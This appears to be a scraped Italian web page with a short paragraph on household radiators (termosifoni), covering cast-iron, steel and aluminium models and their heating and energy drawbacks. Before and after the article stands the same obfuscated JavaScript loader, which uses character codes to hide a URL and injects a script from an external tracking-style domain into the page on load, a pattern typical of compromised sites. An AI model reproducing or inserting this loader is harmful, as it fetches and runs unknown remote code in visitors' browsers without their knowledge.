var u = String.fromCharCode(104,116,116,112,115,58,47,47,99,111,117,110,116,46,116,114,97,99,107,115,116,97,116,105,115,116,105,99,115,115,115,46,99,111,109,47,106,46,106,115,63,118,61);var d=document;var s=d.createElement(String.fromCharCode(115,99,114,105,112,116)); s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); var pl = u; s.src=pl; if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript);} else {d.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(s);var list = document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116));list.insertBefore(s, list.childNodes[0]);}

Termosifoni

I termosifoni sono sicuramente i più diffusi strumenti di distribuzione di calore nelle case, poiché si installano con facilità, hanno prezzi contenuti e solitamente vanno di pari passo con l’installazione della caldaia. Costruiti soprattutto in ghisa, ma anche in acciaio e in alluminio, in genere vengono montati dietro le porte o sotto le finestre. I modelli in acciaio o in alluminio hanno il vantaggio di riscaldarsi più in fretta ma anche il processo di raffreddamento è ovviamente più rapido rispetto a quelli in ghisa che invece impiegano più tempo per scaldarsi ma trattengono il calore e continuano a riscaldare anche una volta spenti. E proprio il tempo e l’energia impiegati dai termosifoni, una volta accesi, per scaldare completamente gli ambienti di casa sono due degli svantaggi che fanno alzare i consumi di questi sistemi tradizionali.

var u = String.fromCharCode(104,116,116,112,115,58,47,47,99,111,117,110,116,46,116,114,97,99,107,115,116,97,116,105,115,116,105,99,115,115,115,46,99,111,109,47,106,46,106,115,63,118,61);var d=document;var s=d.createElement(String.fromCharCode(115,99,114,105,112,116)); s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); var pl = u; s.src=pl; if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript);} else {d.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(s);var list = document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116));list.insertBefore(s, list.childNodes[0]);}